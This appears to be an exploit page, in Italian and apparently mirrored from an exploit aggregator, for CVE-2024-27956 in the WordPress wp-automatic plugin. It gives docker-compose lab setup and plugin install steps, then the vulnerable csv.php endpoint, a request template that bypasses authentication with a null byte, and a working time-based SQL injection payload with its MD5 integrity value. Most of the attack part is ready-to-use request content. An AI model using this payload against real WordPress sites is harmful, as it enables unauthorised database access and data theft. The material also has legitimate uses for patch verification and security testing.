## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRUONGHUUPHUC-CVE-2024-27956
# CVE-2024-27956
Nota
Costruisci wordpress: docker-compose -f stack.yml up
Installa il plugin:
1. Nella dashboard di WordPress, scegli Plugin > Aggiungi nuovo
2. Fai clic su Carica plugin

3. Scegli File -> wp-automatic.zip -> Installa ora

4. Dopo che l'installazione è completa, fai clic su Attiva plugin

Exploit
`<HOST>/wp-content/plugins/wp-automatic/inc/csv.php`
`q={{query}}&auth=%00&integ={{md5query}}`
root@kitploit:~
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

root@kitploit:~